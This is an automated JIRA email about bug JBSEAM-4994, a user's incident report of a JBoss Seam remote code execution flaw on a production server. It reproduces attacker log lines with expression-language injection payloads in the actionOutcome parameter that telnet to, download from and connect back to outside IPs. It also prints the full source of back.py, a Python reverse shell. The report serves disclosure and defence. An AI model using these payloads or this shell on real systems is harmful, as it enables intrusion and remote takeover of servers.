<style>
/* Changing the layout to use less space for mobiles */
@media screen and (max-device-width: 480px), screen and (-webkit-min-device-pixel-ratio: 2) {
#email-body { min-width: 30em !important; }
#email-page { padding: 8px !important; }
#email-banner { padding: 8px 8px 0 8px !important; }
#email-avatar { margin: 1px 8px 8px 0 !important; padding: 0 !important; }
#email-fields { padding: 0 8px 8px 8px !important; }
#email-gutter { width: 0 !important; }
}
</style>
<div id="email-body">
<table id="email-wrap" align="center" border="0" cellpadding="0" cellspacing="0" style="background-color:#f0f0f0;color:#000000;width:100%;">
<tr valign="top">
<td id="email-page" style="padding:16px !important;">
<table align="center" border="0" cellpadding="0" cellspacing="0" style="background-color:#ffffff;border:1px solid #bbbbbb;color:#000000;width:100%;">
<tr valign="top">
<td bgcolor="#3b4d64" style="background-color:#3b4d64;color:#ffffff;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;line-height:1;"><img src="https://issues.jboss.org/s/en_US-g3yjjf/733/58/_/jira-logo-scaled.png" alt="" style="vertical-align:top;" /></td>
</tr><tr valign="top">
<td id="email-banner" style="padding:32px 32px 0 32px;">
<table align="left" border="0" cellpadding="0" cellspacing="0" width="100%" style="width:100%;">
<tr valign="top">
<td style="color:#505050;font-family:Arial,FreeSans,Helvetica,sans-serif;padding:0;">
<img id="email-avatar" src="https://community.jboss.org/people/kevineliuk/avatar/16.png" alt="" height="48" width="48" border="0" align="left" style="padding:0;margin: 0 16px 16px 0;" />
<div id="email-action" style="padding: 0 0 8px 0;font-size:12px;line-height:18px;">
<a class="user-hover" rel="kevineliuk" id="email_kevineliuk" href="https://issues.jboss.org/secure/ViewProfile.jspa?name=kevineliuk" style="color:#003366;">Kevin Eliuk</a>
created <img src="https://issues.jboss.org/images/icons/bug.gif" height="16" width="16" border="0" align="absmiddle" alt="Bug"> <a style='color:#003366;text-decoration:none;' href='https://issues.jboss.org/browse/JBSEAM-4994'>JBSEAM-4994</a>
</div>
<div id="email-summary" style="font-size:16px;line-height:20px;padding:2px 0 16px 0;">
<a style='color:#003366;text-decoration:none;' href='https://issues.jboss.org/browse/JBSEAM-4994'><strong>JBoss Seam remote execution vulnerability</strong></a>
</div>
</td>
</tr>
</table>
</td>
</tr>
<tr valign="top">
<td id="email-fields" style="padding:0 32px 32px 32px;">
<table border="0" cellpadding="0" cellspacing="0" style="padding:0;text-align:left;width:100%;" width="100%">
<tr valign="top">
<td id="email-gutter" style="width:64px;white-space:nowrap;"></td>
<td>
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Issue Type:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
<img src="https://issues.jboss.org/images/icons/bug.gif" height="16" width="16" border="0" align="absmiddle" alt="Bug"> Bug
</td>
</tr> <tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Affects Versions:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
2.1.2.GA </td>
</tr>
<tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Assignee:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
Unassigned </td>
</tr> <tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Components:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
Security </td>
</tr>
<tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Created:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
19/Jun/12 5:55 PM
</td>
</tr> <tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Description:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
<p style='margin-top:0;margin-bottom:10px;'>Recently discovered an exploit on our production server which appears to have allowed someone remote access to the user account set up for jboss.</p>
<p style='margin-top:0;margin-bottom:10px;'>I have not found anything to show this has been reported previously. I have not yet reproduced and am working on fully understanding the exploit.</p>
<p style='margin-top:0;margin-bottom:10px;'>== server.log ==<br/>
2012-05-22 13:53:10,198 36426506 INFO <span class="error">[STDOUT]</span> (ajp-0.0.0.0-8009-15<img class="emoticon" src="https://issues.jboss.org/images/icons/emoticons/smile.gif" height="20" width="20" align="absmiddle" alt="" border="0"/> 13:53:10,198 INFO <span class="error">[PathLogger]</span> anonymous_user just landed on /*********<b>/</b>***/home.xhtml,pid=null, cid=1837 longrunning=true,nested=false, ipAddress115.238.137.24<br/>
2012-05-22 13:53:16,595 36432903 INFO <span class="error">[STDOUT]</span> (ajp-0.0.0.0-8009-15<img class="emoticon" src="https://issues.jboss.org/images/icons/emoticons/smile.gif" height="20" width="20" align="absmiddle" alt="" border="0"/> 13:53:16,595 INFO <span class="error">[PathLogger]</span> anonymous_user just landed on /*********<b>/</b>***/home.xhtml,pid=null, cid=1837 longrunning=true,nested=false, ipAddress115.238.137.24</p>
<p style='margin-top:0;margin-bottom:10px;'>== httpd.log with pertinent sections grouped ==<br/>
/*<br/>
115.238.137.24 - - <span class="error">[22/May/2012:13:53:17 -0700]</span> "GET /a4j/s/3_3_1.GAorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=F08596F88DBB2D34013012462EB468AC HTTP/1.1" 200 6677<br/>
115.238.137.24 - - <span class="error">[22/May/2012:13:53:17 -0700]</span> "GET /a4j/s/3_3_1.GAcss/panel.xcss/DATB/eAF7sqpgb-jyGdIAFrMEaw__;jsessionid=F08596F88DBB2D34013012462EB468AC HTTP/1.1" 200 561<br/>
115.238.137.24 - - <span class="error">[22/May/2012:13:53:17 -0700]</span> "GET /a4j/g/3_3_1.GAorg/richfaces/renderkit/html/scripts/skinning.js HTTP/1.1" 200 1224<br/>
115.238.137.24 - - <span class="error">[22/May/2012:13:53:18 -0700]</span> "GET /extranet/css/blueprint/screen.css HTTP/1.1" 200 4150<br/>
115.238.137.24 - - <span class="error">[22/May/2012:13:53:18 -0700]</span> "GET /extranet/css/extranet.css HTTP/1.1" 200 10799<br/>
115.238.137.24 - - <span class="error">[22/May/2012:13:53:18 -0700]</span> "GET /extranet/js/site.js HTTP/1.1" 200 539<br/>
115.238.137.24 - - <span class="error">[22/May/2012:13:53:17 -0700]</span> "GET /a4j/g/3_3_1.GAorg.ajax4jsf.javascript.AjaxScript HTTP/1.1" 200 67842<br/>
*/</p>
<p style='margin-top:0;margin-bottom:10px;'>115.238.137.24 - - <span class="error">[22/May/2012:13:52:54 -0700]</span> "GET /*********<b>/</b>***/home.seam HTTP/1.1" 200 172555<br/>
115.238.137.24 - - <span class="error">[22/May/2012:13:53:20 -0700]</span> "GET /*********<b>/</b>***/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'telnet%20221.122.113.133%2028')} HTTP/1.1" 302 -<br/>
115.238.137.24 - - <span class="error">[22/May/2012:13:53:21 -0700]</span> "GET /pwn.seam?pwned=java.lang.UNIXProcess%4033c82634&cid=1838 HTTP/1.1" 404 979</p>
<p style='margin-top:0;margin-bottom:10px;'>/*<br/>
115.238.137.24 - - <span class="error">[22/May/2012:13:53:21 -0700]</span> "GET /favicon.ico HTTP/1.1" 404 988<br/>
*/</p>
<p style='margin-top:0;margin-bottom:10px;'>115.238.137.24 - - <span class="error">[22/May/2012:13:53:37 -0700]</span> "GET /home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'wget%20-O%20/tmp/back.py%20220.112.40.101/back.py')}null),%20'telnet%20221.122.113.133%2028')} HTTP/1.1" 302 -<br/>
115.238.137.24 - - <span class="error">[22/May/2012:13:53:38 -0700]</span> "GET /pwn.seam?pwned=java.lang.UNIXProcess%4051bc9d5bnull%29%2C+%27telnet+221.122.113.133+28%27%29%7D&cid=1841 HTTP/1.1" 404 979</p>
<p style='margin-top:0;margin-bottom:10px;'>/*<br/>
115.238.137.24 - - <span class="error">[22/May/2012:13:53:39 -0700]</span> "GET /favicon.ico HTTP/1.1" 404 988<br/>
*/</p>
<p style='margin-top:0;margin-bottom:10px;'>115.238.137.24 - - <span class="error">[22/May/2012:13:53:43 -0700]</span> "GET /home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),%20'python%20/tmp/back.py%20221.122.113.133%2028')} HTTP/1.1" 302 -<br/>
115.238.137.24 - - <span class="error">[22/May/2012:13:53:44 -0700]</span> "GET /pwn.seam?pwned=java.lang.UNIXProcess%407724369d&cid=1844 HTTP/1.1" 404 979</p>
<p style='margin-top:0;margin-bottom:10px;'>/*<br/>
115.238.137.24 - - <span class="error">[22/May/2012:13:53:45 -0700]</span> "GET /favicon.ico HTTP/1.1" 404 988<br/>
*/</p>
<p style='margin-top:0;margin-bottom:10px;'>Discovered the following information on some searches</p>
<p style='margin-top:0;margin-bottom:10px;'>== <a href="http://erro.sinaapp.com/?p=47">http://erro.sinaapp.com/?p=47</a> ==</p>
<p style='margin-top:0;margin-bottom:10px;'><a href="http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478">http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478</a></p>
<p style='margin-top:0;margin-bottom:10px;'><a href="http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23">http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23</a>{expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[6]}</p>
<p style='margin-top:0;margin-bottom:10px;'><a href="http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23">http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23</a>{expressions.getClass().forName(‘java.lang.Runtime’)}.getDeclaredMethods()<span class="error">[13]</span>}</p>
<p style='margin-top:0;margin-bottom:10px;'><a href="http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23">http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23</a>{expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[13].invoke(expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[6].invoke(null), ‘wget http://www.bitpress.com.cn/uploads/back.py -O /tmp/back.py’)}</p>
<p style='margin-top:0;margin-bottom:10px;'><a href="http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23">http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23</a>{expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[13].invoke(expressions.getClass().forName(‘java.lang.Runtime’).getDeclaredMethods()[6].invoke(null), ‘perl /tmp/back.py 118.122.176.42 53′)}</p>
<p style='margin-top:0;margin-bottom:10px;'>== back.py ==<br/>
#!/usr/bin/python</p>
<p style='margin-top:0;margin-bottom:10px;'>import sys</p>
<p style='margin-top:0;margin-bottom:10px;'>import os</p>
<p style='margin-top:0;margin-bottom:10px;'>import socket</p>
<p style='margin-top:0;margin-bottom:10px;'>import pty</p>
<p style='margin-top:0;margin-bottom:10px;'>shell = "/bin/sh"</p>
<p style='margin-top:0;margin-bottom:10px;'>def usage(programname):</p>
<p style='margin-top:0;margin-bottom:10px;'> print "Python connect-back door"</p>
<p style='margin-top:0;margin-bottom:10px;'> print "Usage: %s <conn_back_ip> <port>" % programname</p>
<p style='margin-top:0;margin-bottom:10px;'>def main():</p>
<p style='margin-top:0;margin-bottom:10px;'> if len(sys.argv) !=3:</p>
<p style='margin-top:0;margin-bottom:10px;'> usage(sys.argv<span class="error">[0]</span>)</p>
<p style='margin-top:0;margin-bottom:10px;'> sys.exit(1)</p>
<p style='margin-top:0;margin-bottom:10px;'>s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)</p>
<p style='margin-top:0;margin-bottom:10px;'>try:</p>
<p style='margin-top:0;margin-bottom:10px;'> s.connect((socket.gethostbyname(sys.argv<span class="error">[1]</span>),int(sys.argv<span class="error">[2]</span>)))</p>
<p style='margin-top:0;margin-bottom:10px;'> print "<span class="error">[+]</span>Connect OK."</p>
<p style='margin-top:0;margin-bottom:10px;'>except:</p>
<p style='margin-top:0;margin-bottom:10px;'> print "<span class="error">[-]</span>Can't connect"</p>
<p style='margin-top:0;margin-bottom:10px;'> sys.exit(2)</p>
<p style='margin-top:0;margin-bottom:10px;'>os.dup2(s.fileno(),0)</p>
<p style='margin-top:0;margin-bottom:10px;'>os.dup2(s.fileno(),1)</p>
<p style='margin-top:0;margin-bottom:10px;'>os.dup2(s.fileno(),2)</p>
<p style='margin-top:0;margin-bottom:10px;'>global shell</p>
<p style='margin-top:0;margin-bottom:10px;'>os.unsetenv("HISTFILE")</p>
<p style='margin-top:0;margin-bottom:10px;'>os.unsetenv("HISTFILESIZE")</p>
<p style='margin-top:0;margin-bottom:10px;'>pty.spawn(shell)</p>
<p style='margin-top:0;margin-bottom:10px;'>s.close()</p>
<p style='margin-top:0;margin-bottom:10px;'>if _<em>name</em>_ == "_<em>main</em>_":</p>
<p style='margin-top:0;margin-bottom:10px;'> main()</p>
</td>
</tr>
<tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Project:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
<a style="color:#003366;" href="https://issues.jboss.org/browse/JBSEAM">Seam 2</a>
</td>
</tr> <tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Priority:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
<img src="https://issues.jboss.org/images/icons/priority_major.gif" height="16" width="16" border="0" align="absmiddle" alt="Major"> Major
</td>
</tr> <tr valign="top">
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 10px 10px 0;white-space:nowrap;">
<strong style="font-weight:normal;color:#505050;">Reporter:</strong>
</td>
<td style="color:#000000;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:12px;padding:0 0 10px 0;width:100%;">
<a class="user-hover" rel="kevineliuk" id="email_kevineliuk" href="https://issues.jboss.org/secure/ViewProfile.jspa?name=kevineliuk" style="color:#003366;">Kevin Eliuk</a>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td><!-- End #email-page -->
</tr>
<tr valign="top">
<td style="color:#505050;font-family:Arial,FreeSans,Helvetica,sans-serif;font-size:10px;line-height:14px;padding: 0 16px 16px 16px;text-align:center;">
This message is automatically generated by JIRA.<br />
If you think it was sent incorrectly, please contact your <a style='color:#003366;' href='https://issues.jboss.org/secure/ContactAdministrators!default.jspa'>JIRA administrators</a>.<br />
For more information on JIRA, see: <a style='color:#003366;' href='http://www.atlassian.com/software/jira'>http://www.atlassian.com/software/jira</a>
</td>
</tr>
</table><!-- End #email-wrap -->
</div><!-- End #email-body -->